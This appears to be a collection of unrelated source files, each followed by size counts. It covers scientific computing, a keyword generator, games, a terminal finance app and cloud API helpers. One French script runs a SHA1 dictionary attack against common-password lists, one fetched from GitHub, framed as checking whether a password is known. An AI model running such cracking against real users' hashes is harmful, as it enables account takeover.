if wmax < 0 or lmax < 0 or xmax < 0 or omax < 0 or bmax < 0 or mmax < 1 or umax < 0 or pmax < 0:
return None
if size(aa) == 0 or mult < 1:
return None
if not vars(aa).issubset(uvars(uu)):
return None
if not okLevel(zzg):
return None
decomper_log.info(">>> decomper")
t1 = timer()
x1 = decomp(uu,emptyTree(),sdict(),1)
decomper_log.info("nodes: %d" % len(treesNodes(dfzz(x1[1]))))
t2 = timer()
decomper_log.info("<<< decomper repa %.3fs" % (t2 - t1))
stdout.flush()
return x1
| 43,415 | 17,385 |
import tensorflow as tf
import gc
def dump_tensors():
"""
https://forums.fast.ai/t/gpu-memory-not-being-freed-after-training-is-over/10265/6
"""
tf.keras.backend.clear_session()
gc.collect()
| 213 | 87 |
# -*- coding: utf-8 -*-
"""
dB 函数 CUDA
"""
import numpy as np
import pycuda.driver as drv
import pycuda.autoinit
from pycuda.compiler import SourceModule
from cctpy.baseutils import Vectors
mod = SourceModule("""
// cct_for_cuda.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//
#include<stdio.h>
#include <math.h> // CUDA IGNORE
#define MM 0.001f
#define DIM 3
#define PI 3.1415927f
#define X 0
#define Y 1
#define Z 2
float sqrtf(float a) {
return (float)sqrt(a);
}
__device__ __forceinline__ void add3d(float* a, float* b, float* ret)
{
ret[X] = a[X] + b[X];
ret[Y] = a[Y] + b[Y];
ret[Z] = a[Z] + b[Z];
}
__device__ __forceinline__ void add3d_local(float* a_local, float* b)
{
a_local[X] += b[X];
a_local[Y] += b[Y];
a_local[Z] += b[Z];
}
__device__ __forceinline__ void sub3d(float* a, float* b, float* ret)
{
ret[X] = a[X] - b[X];
ret[Y] = a[Y] - b[Y];
ret[Z] = a[Z] - b[Z];
}
__device__ __forceinline__ void copy3d(float* src, float* des)
{
des[X] = src[X];
des[Y] = src[Y];
des[Z] = src[Z];
}
__device__ __forceinline__ void cross3d(float* a, float* b, float* ret)
{
ret[X] = a[Y] * b[Z] - a[Z] * b[Y];
ret[Y] = -a[X] * b[Z] + a[Z] * b[X];
ret[Z] = a[X] * b[Y] - a[Y] * b[X];
}
__device__ __forceinline__ void dot_a_v(float a, float* v)
{
v[X] *= a;
v[Y] *= a;
v[Z] *= a;
}
__device__ __forceinline__ float dot_v_v(float* v1, float* v2)
{
return v1[X] * v2[X] + v1[Y] * v2[Y] + v1[Z] * v2[Z];
}
__device__ __forceinline__ float len3d(float* v)
{
return sqrtf(v[X] * v[X] + v[Y] * v[Y] + v[Z] * v[Z]);
}
__device__ __forceinline__ void neg3d(float* v)
{
v[X] = -v[X];
v[Y] = -v[Y];
v[Z] = -v[Z];
}
// 注意,这里计算的不是电流元的磁场,还需要乘以 电流 和 μ0/4π (=1e-7)
__global__ void dB(float *p0, float *p1, float *p, float *ret)
{
float p01[DIM];
float r[DIM];
float rr;
sub3d(p1, p0, p01); // p01 = p1 - p0
add3d(p0, p1, r); // r = p0 + p1
dot_a_v(0.5,r); // r = (p0 + p1)/2
sub3d(p, r, r); // r = p - r
rr = len3d(r); // rr = len(r)
cross3d(p01, r, ret); // ret = p01 x r
rr = 1.0 / rr / rr / rr; // changed
dot_a_v(rr, ret); // rr . (p01 x r)
}
""")
f = mod.get_function("dB")
# float *p0, float *p1, float *p, float *ret
def dB(p0: np.ndarray, p1: np.ndarray, p: np.ndarray, result: np.ndarray) -> None:
f(drv.In(p0), drv.In(p1), drv.In(p), drv.Out(result), block=(1, 1, 1), grid=(1, 1))
| 2,438 | 1,278 |
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/00_model_based_keyword_generation.ipynb (unless otherwise specified).
__all__ = ['BartKeywordGenerator', 'ExtractiveKeywordGenerator', 'AbstractiveKeywordGenerator']
# Cell
from transformers import TextGenerationPipeline, TFAutoModelForPreTraining, TFBartForConditionalGeneration, BartTokenizer, pipeline
# Cell
class BartKeywordGenerator():
"""
Bart based keyword generator using huggingface transformers
"""
def __init__(self, model_name, use_cuda=False):
self.model_name = model_name
self.model = TFBartForConditionalGeneration.from_pretrained(self.model_name, from_pt=True)
self.tokenizer = BartTokenizer.from_pretrained(self.model_name)
self.use_cuda = use_cuda
self.device = 0 if use_cuda else -1
self.keyword_generator = pipeline("summarization", model=self.model, tokenizer=self.tokenizer, device=self.device)
def generate(self, text, max_length=50, **kwargs):
generated_keywords = self.keyword_generator(text, max_length=max_length, **kwargs)
keywords = []
for keyword in generated_keywords:
keywords.append({"keywords": keyword['summary_text'].split(";")})
return keywords
def batch_generate(self, texts, batch_size=8, max_length=50, **kwargs):
batches = [texts[i:i + batch_size] for i in range(0, len(texts), batch_size)]
keywords = []
for batch in batches:
batch_keywords = self.generate(batch, max_length=max_length, **kwargs)
keywords.extend(batch_keywords)
return keywords
# Cell
class ExtractiveKeywordGenerator(BartKeywordGenerator):
"""It will generate extractive keywords using bart based fined tunned model on openkp datasets"""
def __init__(self, use_cuda=False):
model_name = "ankur310794/bart-base-keyphrase-generation-openkp"
super().__init__(model_name, use_cuda)
# Cell
class AbstractiveKeywordGenerator(BartKeywordGenerator):
"""It will generate abstractive keywords using bart based fined tunned model on kpTimes dataset"""
def __init__(self, use_cuda=False):
model_name = "ankur310794/bart-base-keyphrase-generation-kpTimes"
super().__init__(model_name, use_cuda)
| 2,161 | 703 |
import pandas as pd
import matplotlib.pyplot as plt
import os
import time
intro= """\
\\documentclass[a4paper]{article}
%% Language and font encodings
\\usepackage[english]{babel}
\\usepackage[utf8x]{inputenc}
\\usepackage[T1]{fontenc}
%% Sets page size and margins
\\usepackage[a4paper,top=3cm,bottom=2cm,left=3cm,right=3cm,marginparwidth=1.75cm]{geometry}
%% Useful packages
\\usepackage{amsmath}
\\usepackage{graphicx}
\\usepackage[colorinlistoftodos]{todonotes}
\\usepackage[colorlinks=true, allcolors=blue]{hyperref}
\\title{Your Paper}
\\author{You}
\\begin{document}
\\maketitle
\\newpage
"""
banner= """\
___ _ ___ _ _
/ __|___ ___ _ _ __ _ ___ __ _ _ _ __| | | _ \__ _| |__| |___ ___
| (_ / -_) _ \ '_/ _` / -_) / _` | ' \/ _` | | _/ _` | '_ \ / _ (_-<
\___\___\___/_| \__, \___| \__,_|_||_\__,_| |_| \__,_|_.__/_\___/__/
|___/
___ _
/ __|___ __| |___
| (__/ _ \/ _` / -_)
\___\___/\__,_\___|
###################################################################################
"""
def writehdf5(dic,parameters,fig,fig1,fig2,localtime=""):
if localtime=="":
localtime = str(time.asctime( time.localtime(time.time())))
datafile=localtime.replace(" ","")
os.system("mkdir results/Plots/"+datafile)
fig.savefig("results/Plots/"+datafile+"/IV.png")
fig1.savefig("results/Plots/"+datafile+"/Cond.png")
fig2.savefig("results/Plots/"+datafile+"/Resistance.png")
hdf = pd.HDFStore("results/data/{0}.h5".format(localtime))
data = pd.DataFrame(data=dic)
hdf.put(value=data, key='df', format='table', data_columns=True)
parametersdic={'Minimum_current':[parameters[0]],'Maximum_current':[parameters[1]],'Step_current':[parameters[2]], 'Amplitude_oscillation':[parameters[3]], 'Frequency_oscillation':[parameters[4]], 'Lengt_wire':[parameters[5]], 'Diameter_wire':[parameters[6]], 'Ac_Gain':[parameters[8]],'Dc_gain': [parameters[9]]}
dp = pd.DataFrame(data=parametersdic)
hdf.put(value=dp, key='dp', format='table', data_columns=True)
hdf.close()
return localtime
def readhdf5():
hdf = pd.HDFStore("results/data.h5")
return hdf['{0}'.format(input("Name of the dataframe to load within the file:"))]
def Latex():
datafiles = os.listdir("results/data")
with open('results/Log.tex','w') as log:
log.write(intro)
os.system("mkdir results/Plots/")
for datafile in datafiles:
print(datafile)
# fig, ax= plt.subplots()
# ax.grid(color='b', linestyle='--', linewidth=0.5)
# fig.suptitle('V-I Plot', fontsize=10)
# plt.ylabel('Voltage (V)')
# plt.xlabel('Current (A)')
# ax.errorbar(dic['I'], dic['V'], yerr=dic['eV'], color='b', fmt='o' ,capthick=2 )
#
# fig1, bx = plt.subplots()
# fig1.suptitle('Differential conductance - Current Plot', fontsize=10)
# plt.xlabel('Current (A)')
# plt.ylabel('Dif Conductance (A/V)')
# bx.grid(color='b', linestyle='--', linewidth=0.5)
# bx.errorbar(dic['I'], dic['dC'], yerr=dic['edC'], color='r', fmt='o' ,capthick=2 )
#
#
# fig2, cx = plt.subplots()
# fig1.suptitle('Differential Resistance - Current Plot', fontsize=10)
# plt.xlabel('Current (A)')
# plt.ylabel('Dif Resistance (V/A)')
# cx.grid(color='b', linestyle='--', linewidth=0.5)
# cx.errorbar(dic['I'], dic['dR'], yerr=dic['edR'], color='g', fmt='o', capthick=2)
print(datafile)
try:
hdf = pd.HDFStore("results/data/"+datafile)
datafile = datafile[:-3].replace(" ","")
parameters=hdf['dp']
log.write("\\section{"+datafile+"}\n")
os.system("clear")
log.write("\\begin{figure}[h] \n\\centering \n")
log.write("\\includegraphics[width=0.4\\textwidth]{Plots/"+datafile+"/IV.png}\n")
log.write("\\includegraphics[width=0.4\\textwidth]{Plots/"+datafile+"/Cond.png}\n")
log.write("\\includegraphics[width=0.4\\textwidth]{Plots/"+datafile+"/Resistance.png}\n")
log.write("\\end{figure}\\\\\\\\\n\n")
os.system("clear")
log.write("All values are given in SI units\\\\ \n")
for parameter in parameters.keys():
log.write(parameter+": $"+str(parameters[parameter][0])+"$\\\\ \n")
log.write("File data stored in results/data/"+datafile+".h5")
os.system("clear")
hdf.close()
except:
log.write("\\section{"+datafile+"}\n")
log.write("Data corrupt or format not expected. File should be checked manually.")
log.write("\\newpage\n")
os.system("clear")
print(banner)
print("Generating Latex class:")
print(datafile +"Added")
log.write("\\end{document}")
os.system("clear")
print("All data has been saved")
return
Latex()
| 5,344 | 1,778 |
from connect4_board import Board
from connect4_board import Player
import random
class Driver:
def __init__(self):
playerOne = input('Input Player 1 name: ')
playerTwo = input('Input Player 2 name: ')
self.p1 = Player(1,'X', playerOne)
self.p2 = Player(2,'O', playerTwo)
self.board = Board()
def prompt(self, name):
while True:
try:
userInput = int(input(name+' Insert Column (1-7): '))
if not (1 <= userInput <= 7):
raise ValueError
if self.board.board[0][userInput-1]!='.':
raise Exception
except ValueError:
print('Please enter an integer from 0-7')
continue
except Exception:
print('Column reached maximum. ',end = '')
continue
return userInput-1
def decideStart(self):
#player 1 start if random integer is even
#player 2 if odd
if (random.randint(0,9) % 2 == 0):
print(self.p1.getPlayerName(),'Start!')
return self.p1, self.p2
else:
print(self.p2.getPlayerName(),'Start!')
return self.p2, self.p1
def printBoard(self):
print(self.board, end = '')
print('-------------')
print('1 2 3 4 5 6 7')
def playerInsert(self, player):
'''
Method to insert player moves
Method to change update the board
'''
userinput = self.prompt(player.getPlayerName())
row = self.board.findRow(userinput, player)
player.addMoves(row, userinput)
self.printBoard()
if player.checkWin():
print(player.getPlayerName(),'Won')
return True
return False
def tick(self):
starter, second = self.decideStart()
endGame = False
self.printBoard()
while not endGame:
#starter insert
endGame = self.playerInsert(starter) or self.board.isFull()
if endGame is True:
break
#second insert
endGame = self.playerInsert(second) or self.board.isFull()
if self.board.isFull():
print('The game is tied!')
if __name__ == '__main__':
main = Driver()
main.tick() | 1,896 | 763 |
from urllib.request import urlopen, hashlib, time
# Une petite fonction pour un timer entre les 2 méthodes (locale et distante).
def sleeper(num):
while True:
# Try to convert it to a float
try:
num = float(num)
except ValueError:
continue
# lance la commande time.sleep() et affiche le timestamp de début et de fin.
print('Programme en pause à: %s' % time.ctime())
time.sleep(num)
print('Reprise du programme à: %s\n' % time.ctime())
return False
# Valeur du mot de passe à tester
motdepass = input("Renseiger le mot de passe à tester.\n>")
# On le Hash avec SHA1 et on memorise sa valeur
hash_SHA1 = hashlib.sha1(bytes(motdepass, 'utf-8')).hexdigest()
#################################################
# On recupère un dico de mots de passe courrant #
# Plusieurs méthodes possibles !!! #
#################################################
# dictionnaire_crack_01 = open('1_mille_knows_password_1000.txt', mode = 'r', buffering = 1, newline = '\n', encoding = 'utf-8')
# dictionnaire_crack_02 = str(urlopen('https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10-million-password-list-top-10000.txt').read(), 'utf-8')
########################################################################
# Avec la fonction native "open" si le fichier est stocké en local: #
# on utilise "with" pour s'assurer que le fichier ne reste pas ouvert. #
# Celui-ci ne contient que 1 million de mots (8meg environ)... #
########################################################################
with open('1_million_knows_password_1000000.txt', mode = 'r', buffering = 1, newline = '\n', encoding = 'utf-8') as dictionnaire_crack_01:
# On boucle tant qu'on est pas arrivé à la fin du DICO
for to_easy in dictionnaire_crack_01:
# On boucle encore, mais pour 1 mot = 1 ligne...
for cracked_pass in to_easy.split ():
# On Hash chaque mot de passe du DICO
hash_DICO_01 = hashlib.sha1(bytes(cracked_pass, 'utf-8')).hexdigest()
# On les compare
if hash_DICO_01 == hash_SHA1:
# Si les mots de passe sont semblable on les affiche et on stop la comparaison
print("Mot de passe connue: ", str(cracked_pass))
print("The Hash password input is: ", str(hash_SHA1))
print("The Hash password found is: ", str(hash_DICO_01))
quit()
# Sinon on continue la recherche avec le mot de passe suivant dans le DICO
elif hash_DICO_01 != hash_SHA1:
print("Comparaison échouée! ", str(cracked_pass)," Test suivant...")
# Le mot de passe n'est pas dans la liste.
print("Le mot de passe ", "[ ", str(motdepass), " ]", " n'est pas encore connue !!!")
# Une petite pause de 5 seconds...
# On appel la fonction "sleeper" avec 10s en paramètre, équivalent à : "time.sleep(10)"
sleeper(10)
############################################################################
# Avec la fonction importée "urlopen" si le fichier est stocké sur le net: #
# On patiente en fonction de la taille du fichier... #
# On boucle en lisant les mots de passe du dico un par un (un par ligne) #
############################################################################
# on importe un petit DICO pour le test:
dictionnaire_crack_02 = str(urlopen('https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10-million-password-list-top-1000.txt').read(), 'utf-8')
for to_easy_02 in dictionnaire_crack_02.split('\n'):
# On Hash chaque mot de passe du DICO
hash_DICO_02 = hashlib.sha1(bytes(to_easy_02, 'utf-8')).hexdigest()
# On les compare
if hash_DICO_02 == hash_SHA1:
# Si les mots de passe sont semblable on les affiche et on stop la comparaison
print("Mot de passe connue: ", str(to_easy_02))
print("The Hash password input is: ", str(hash_SHA1))
print("The Hash password found is: ", str(hash_DICO_02))
quit()
# Sinon on continue la recherche avec le mot de passe suivant dans le DICO
elif hash_DICO_02 != hash_SHA1:
print("Comparaison échouée! ", str(to_easy_02)," Test suivant...")
# Le mot de passe n'est pas dans la liste.
print("Le mot de passe ", "[ ", str(motdepass), " ]", " n'est pas encore connue !!!") | 4,450 | 1,421 |
import logging
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
fh = logging.FileHandler('otp.log')
fh.setLevel(logging.DEBUG)
logger.addHandler(fh)
import argparse
import urwid
import data_controller
import symbol_values
_BACKGROUND = urwid.SolidFill(u'\N{MEDIUM SHADE}')
_BASE_CURRENCY = 'CHF'
_main_event_loop = urwid.AsyncioEventLoop()
_PALETTE = [
('brand', 'bold,underline,dark blue', ''),
('underline', 'underline', ''),
('bold', 'bold', ''),
('err', 'dark red,bold', ''),
('reversed', 'standout', ''),
('up', 'dark green', ''),
('upbold', 'dark green,bold', ''),
('neutral', '', ''),
('neutralbold', 'bold', ''),
('down', 'dark red', ''),
('downbold', 'dark red,bold', ''),
]
_STYLES = {palette_entry[0] for palette_entry in _PALETTE}
_BOLD_MAP = {key: key + 'bold'
for key in _STYLES if key in _STYLES and key + 'bold' in _STYLES}
class Controller:
def __init__(self):
self.stack = [_BACKGROUND]
self.view = urwid.Padding(self.stack[-1], left=1, right=1)
def unhandled_input(self, key):
try:
self.stack[-1].unhandled_input(key)
except AttributeError:
pass
def _update(self):
self.view.original_widget = self.stack[-1]
def push(self, w):
self.stack.append(w)
self._update()
def pop(self):
self.stack.pop()
try:
self.stack[-1].refresh()
except AttributeError:
pass
self._update()
def make_button(title, callback_fn):
button = urwid.Button(title)
urwid.connect_signal(button, 'click', callback_fn)
return urwid.AttrMap(button, None, focus_map='reversed')
def boldify(w):
return urwid.AttrMap(w, attr_map=_BOLD_MAP)
def on_main(fn):
def callback():
_main_event_loop.alarm(0, lambda: fn())
return callback
class Header(urwid.WidgetWrap):
_ALIGNS = {'l': 'left', 'r': 'right'}
def __init__(self, *titles, aligns=None):
titles = [('underline', title) if not isinstance(title, tuple) else title
for title in titles]
if not aligns:
aligns = ''.join('l' for _ in titles)
aligns = [Header._ALIGNS[align] for align in aligns]
if len(aligns) != len(titles):
raise ValueError
super().__init__(
urwid.Columns([urwid.Text(title, align=align)
for title, align in zip(titles, aligns)]))
class SummaryView(urwid.WidgetWrap):
def __init__(self, dc: data_controller.DataController, controller: Controller):
self.dc = dc
self.controller = controller
self.focus_walker = None
self._last_focus = None
symbol_values.Ticker.register_callback(
'SummaryView',
on_main(self.refresh))
# lambda: controller.main_loop.event_loop.alarm(0, lambda *_: self.refresh()))
with self.dc.connect():
super(SummaryView, self).__init__(self._get_menu())
def unhandled_input(self, key):
if key == 'r':
self.refresh()
def refresh(self):
logger.info('***\nREFRESH\n***')
with self.dc.connect():
self._set_w(self._get_menu())
def __del__(self):
symbol_values.Ticker.remove_callback('SummaryView')
def _get_menu(self):
body = [urwid.Text(('brand', 'ppfin')), urwid.Divider()]
# Normal (category-0) Accounts
accs = self.dc.get_all_accounts(category=0)
body += [Header('Account', 'Diff', 'Balance', aligns='lrr')]
for acc in accs:
body.append(urwid.Columns([
make_button(acc.name, lambda btn: self._show_account(btn.get_label())),
urwid.Text(acc.get_diff_to_last().attr_str(), align='right'),
urwid.Text(str(acc.get_balance()), align='right')]))
total_diff = sum(acc.get_diff_to_last() for acc in accs).attr_str()
total = sum(acc.get_balance() for acc in accs)
# Special (category-1) Accounts
accs = self.dc.get_all_accounts(category=1)
if accs:
for acc in accs:
body.append(urwid.Columns([
make_button(acc.name, lambda btn: self._show_account(btn.get_label())),
urwid.Text(''),
urwid.Text(str(acc.get_balance()), align='right')]))
total += acc.get_balance()
body += [urwid.Columns([
urwid.Text(('bold', 'Total')),
boldify(urwid.Text(total_diff, align='right')),
urwid.Text(('bold', str(total)), align='right')])]
body += [urwid.Divider(),
make_button('Update Balances', self._update_balances),
make_button('Add Account', self._add_account),
urwid.Divider()]
# Shares
symbol_overviews = self.dc.get_all_symbol_overviews()
if not symbol_overviews:
body += [urwid.Text('No Shares!')]
else:
body += [Header('Symbol', 'Shares', 'Gain', 'Possession', aligns='lrrr')]
for so in symbol_overviews:
body.append(urwid.Columns([
make_button(so.symbol, self._update_share),
urwid.Text(str(so.quantity), align='right'),
urwid.Text(so.get_current_total_gain().attr_str(),
align='right'),
urwid.Text(str(so.get_current_total_value()),
align='right')]))
total_gain = sum(
so.get_current_total_gain(currency=_BASE_CURRENCY)
for so in symbol_overviews)
total_share_value = sum(
so.get_current_total_value(currency=_BASE_CURRENCY)
for so in symbol_overviews)
body += [
urwid.Columns([
urwid.Text(('bold', 'Total')),
urwid.Text(''),
urwid.Text(('bold', str(total_gain)), align='right'),
urwid.Text(('bold', str(total_share_value)), align='right'),
])
]
body += [urwid.Divider(),
make_button('Update Shares', self._update_shares),
make_button('Add Share', self._add_share),
urwid.Divider()]
self.focus_walker = urwid.SimpleFocusListWalker(body)
urwid.connect_signal(self.focus_walker, 'modified',
lambda: self._cache_focus_value())
if self._last_focus is not None:
self.focus_walker.set_focus(self._last_focus)
return urwid.ListBox(self.focus_walker)
def _show_account(self, account_name):
self.controller.push(AccountDetailView(
self.dc, self.controller, account_name))
def _cache_focus_value(self):
self._last_focus = self.focus_walker.focus
def _update_share(self, k):
raise ValueError(k.get_label())
def _update_shares(self, _):
pass
def _add_share(self, _):
def done(_):
name = name_edit.get_edit_text()
currency = cur_edit.get_edit_text()
try:
self.dc.add_stock_symbol(name, currency)
except data_controller.SymbolExistsException:
pass # TODO: maybe handle
self.controller.pop()
header = urwid.Text('Add Share')
name_edit = urwid.Edit("Symbol: ")
cur_edit = urwid.Edit("Currency: ")
widget = urwid.Pile([
header,
name_edit,
cur_edit,
make_button('Done', done),
make_button('Cancel', lambda _: self.controller.pop()),
])
self.controller.push(urwid.Filler(widget, 'top'))
def _update_balances(self, _):
self.controller.push(UpdateView(self.dc, self.controller))
def _add_account(self, _):
def done(_):
name, _ = name_edit.get_text()
name = name.replace('Name: ', '')
self.dc.create_account(name, _BASE_CURRENCY) # TODO
self.controller.pop()
name_edit = urwid.Edit("Name: ")
header = urwid.Text('Add Account')
widget = urwid.Pile([
header,
name_edit,
make_button('Done', done),
make_button('Cancel', lambda _: self.controller.pop()),
])
self.controller.push(urwid.Filler(widget, 'top'))
class AccountDetailView(urwid.WidgetWrap):
def __init__(self,
dc: data_controller.DataController,
controller: Controller,
account_name: str):
self.dc = dc
self.controller = controller
self.account_name = account_name
super().__init__(self._get())
def _get(self):
transactions = self.dc.get_account_transactions(self.account_name)
body = [Header('Date', 'Info', 'Amount', aligns='llr')]
for t in transactions:
body.append(urwid.Columns([
urwid.Text(t.date),
urwid.Text(t.info),
urwid.Text(t.value.attr_str(), align='right'),
]))
body += [
urwid.Divider(),
make_button('Done', lambda _: self.controller.pop())]
return urwid.ListBox(urwid.SimpleFocusListWalker(body))
class UpdateView(urwid.WidgetWrap):
def __init__(self,
dc: data_controller.DataController,
controller: Controller):
self.dc = dc
self.controller = controller
self.done_button: urwid.AttrMap = None
self.focus_walker: urwid.SimpleFocusListWalker = None
self.accs = None
super(UpdateView, self).__init__(self._get_menu())
def refresh(self):
self._set_w(self._get_menu())
def unhandled_input(self, key):
if key == 'enter':
# is_ok = self._validate()
current_idx = self.focus_walker.focus
# current_widget = self.focus_walker[current_idx]
next_position = self.focus_walker.next_position(current_idx)
if isinstance(self.focus_walker[next_position], urwid.Divider):
next_position += 1
# if not isinstance(current_widget, urwid.Edit):
# return
self.focus_walker.set_focus(next_position)
def _get_menu(self):
body = [urwid.Text('Update'), urwid.Divider()]
self.accs = self.dc.get_all_accounts(category=0)
if not self.accs:
raise NotImplemented
indent = max(len(acc.name) for acc in self.accs) + 5
for acc in self.accs:
label = acc.name + ':'
indent_acc = (indent - len(label)) * ' '
body.append(urwid.Edit(f"{label}{indent_acc}"))
# make_button(acc.name, lambda _:...),
# urwid.Text(acc.get_formatted_balance(), align='right')]))
def done(_):
all_ok = self._validate()
if all_ok:
self._commit()
self.controller.pop()
self.done_button = make_button('Done', done)
body += [urwid.Divider(),
self.done_button,
make_button('Cancel', lambda _: self.controller.pop()),
]
self.focus_walker = urwid.SimpleFocusListWalker(body)
urwid.connect_signal(self.focus_walker, 'modified',
lambda: self._validate())
return urwid.ListBox(self.focus_walker)
def _commit(self):
edit_fields = [e for e in self.focus_walker
if isinstance(e, urwid.Edit)]
assert len(edit_fields) == len(self.accs)
with self.dc.connect():
for e, acc in zip(edit_fields, self.accs):
assert acc.name in e.caption
value = e.get_edit_text()
if not value:
continue
value = float(value)
diff = value - acc.get_balance()
self.dc.add_transaction(acc.name, diff)
def _validate(self):
all_ok = True
for i, e in enumerate(self.focus_walker):
if not isinstance(e, urwid.Edit):
continue
value = e.get_edit_text()
if not value:
continue
try:
float(value)
is_ok = True
except ValueError:
is_ok = False
caption = e.caption
if is_ok and '!' in caption:
caption = caption.replace('!', ':')
e.set_caption(caption)
if not is_ok and '!' not in caption:
caption = caption.replace(':', '!')
e.set_caption(('err', caption))
all_ok = all_ok and is_ok
if not all_ok:
self.done_button.set_attr_map({None: 'err'})
self.done_button.original_widget.set_label(
'Errors: All values must be floats!')
else:
self.done_button.set_attr_map({None: None})
self.done_button.original_widget.set_label(
'Done')
return all_ok
class MainWindow:
def __init__(self, dc: data_controller.DataController):
self.dc = dc
self.controller = Controller()
self.controller.push(SummaryView(dc, self.controller))
self.main_loop = None
def make_main_loop(self):
self.main_loop = urwid.MainLoop(self.draw(),
palette=_PALETTE,
unhandled_input=self.controller.unhandled_input,
event_loop=_main_event_loop)
return self.main_loop
def draw(self):
top = urwid.Overlay(self.controller.view, _BACKGROUND,
align='center', width=('relative', 80),
valign='middle', height=('relative', 80),
min_width=20, min_height=9)
return top
def item_chosen(button, choice):
raise urwid.ExitMainLoop()
response = urwid.Text([u'You chose ', choice, u'\n'])
done = urwid.Button(u'Ok')
urwid.connect_signal(done, 'click', exit_program)
main.original_widget = urwid.Filler(urwid.Pile([response,
urwid.AttrMap(done, None, focus_map='reversed')]))
def exit_program(button):
raise urwid.ExitMainLoop()
def main():
p = argparse.ArgumentParser()
p.add_argument('--database', '-db', required=True)
flags = p.parse_args()
dc = data_controller.DataController(flags.database)
mw = MainWindow(dc)
loop = mw.make_main_loop()
loop.run()
if __name__ == '__main__':
main()
| 13,244 | 4,480 |
import lupa
from lupa import LuaRuntime
lua = LuaRuntime(unpack_returned_tuples=True)
fileName = "test_json/3.json"
repo_name = "aaa"
meta_version = "bbbb"
comd = ""
comd += "fileName = " + "'"+ fileName +"'\n"
comd += "repo_name = " + "'"+ repo_name +"'\n"
comd += "meta_version = " + "'"+ meta_version +"'\n"
print comd
#lua.eval("dostring("+comd+")")
fo = open("jsonForPY.lua", "w+")
fo.write(comd)
fo.close()
lua.eval("dofile('jsonForPY.lua')")
a = lua.eval("dofile('jsonCompletion.lua')")
print a['appname']
print a['procs']['bar']['port']['port']
| 563 | 242 |
# -*- coding: utf-8 -*-
#
# (c) 2017, Gaudenz Steinlin <gaudenz.steinlin@cloudscale.ch>
# Simplified BSD License (see licenses/simplified_bsd.txt or https://opensource.org/licenses/BSD-2-Clause)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
from copy import deepcopy
from ansible.module_utils.basic import env_fallback
from ansible.module_utils.urls import fetch_url
from ansible.module_utils._text import to_text
API_URL = 'https://api.cloudscale.ch/v1/'
def cloudscale_argument_spec():
return dict(
api_token=dict(fallback=(env_fallback, ['CLOUDSCALE_API_TOKEN']),
no_log=True,
required=True,
type='str'),
api_timeout=dict(default=30, type='int'),
)
class AnsibleCloudscaleBase(object):
def __init__(self, module):
self._module = module
self._auth_header = {'Authorization': 'Bearer %s' % module.params['api_token']}
self._result = {
'changed': False,
'diff': dict(before=dict(), after=dict()),
}
def _get(self, api_call):
resp, info = fetch_url(self._module, API_URL + api_call,
headers=self._auth_header,
timeout=self._module.params['api_timeout'])
if info['status'] == 200:
return self._module.from_json(to_text(resp.read(), errors='surrogate_or_strict'))
elif info['status'] == 404:
return None
else:
self._module.fail_json(msg='Failure while calling the cloudscale.ch API with GET for '
'"%s".' % api_call, fetch_url_info=info)
def _post_or_patch(self, api_call, method, data):
# This helps with tags when we have the full API resource href to update.
if API_URL not in api_call:
api_endpoint = API_URL + api_call
else:
api_endpoint = api_call
headers = self._auth_header.copy()
if data is not None:
# Sanitize data dictionary
# Deepcopy: Duplicate the data object for iteration, because
# iterating an object and changing it at the same time is insecure
for k, v in deepcopy(data).items():
if v is None:
del data[k]
data = self._module.jsonify(data)
headers['Content-type'] = 'application/json'
resp, info = fetch_url(self._module,
api_endpoint,
headers=headers,
method=method,
data=data,
timeout=self._module.params['api_timeout'])
if info['status'] in (200, 201):
return self._module.from_json(to_text(resp.read(), errors='surrogate_or_strict'))
elif info['status'] == 204:
return None
else:
self._module.fail_json(msg='Failure while calling the cloudscale.ch API with %s for '
'"%s".' % (method, api_call), fetch_url_info=info)
def _post(self, api_call, data=None):
return self._post_or_patch(api_call, 'POST', data)
def _patch(self, api_call, data=None):
return self._post_or_patch(api_call, 'PATCH', data)
def _delete(self, api_call):
resp, info = fetch_url(self._module,
API_URL + api_call,
headers=self._auth_header,
method='DELETE',
timeout=self._module.params['api_timeout'])
if info['status'] == 204:
return None
else:
self._module.fail_json(msg='Failure while calling the cloudscale.ch API with DELETE for '
'"%s".' % api_call, fetch_url_info=info)
def _param_updated(self, key, resource):
param = self._module.params.get(key)
if param is None:
return False
if resource and key in resource:
if param != resource[key]:
self._result['changed'] = True
patch_data = {
key: param
}
self._result['diff']['before'].update({key: resource[key]})
self._result['diff']['after'].update(patch_data)
if not self._module.check_mode:
href = resource.get('href')
if not href:
self._module.fail_json(msg='Unable to update %s, no href found.' % key)
self._patch(href, patch_data)
return True
return False
def get_result(self, resource):
if resource:
for k, v in resource.items():
self._result[k] = v
return self._result
| 4,917 | 1,370 |
S = input()
S = S.replace("eraser", "").replace("erase", "").replace("dreamer", "").replace("dream", "")
if len(S) == 0:
print("YES")
else:
print("NO")
| 160 | 64 |
# coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTE: This class is auto generated by the jdcloud code generator program.
from argparse import RawTextHelpFormatter
from jdcloud_cli.cement.ext.ext_argparse import expose
from jdcloud_cli.controllers.base_controller import BaseController
from jdcloud_cli.client_factory import ClientFactory
from jdcloud_cli.parameter_builder import collect_user_args, collect_user_headers
from jdcloud_cli.printer import Printer
from jdcloud_cli.skeleton import Skeleton
class OssopenapiController(BaseController):
class Meta:
label = 'ossopenapi'
help = 'oss openapi'
description = '''
ossopenapi cli 子命令,oss openapi。
OpenAPI文档地址为:https://docs.jdcloud.com/cn/xxx/api/overview
'''
stacked_on = 'base'
stacked_type = 'nested'
@expose(
arguments=[
(['--region-id'], dict(help="""(string) 区域ID """, dest='regionId', required=False)),
(['--bucket-name'], dict(help="""(string) 查询用量的指定bucket """, dest='bucketName', required=True)),
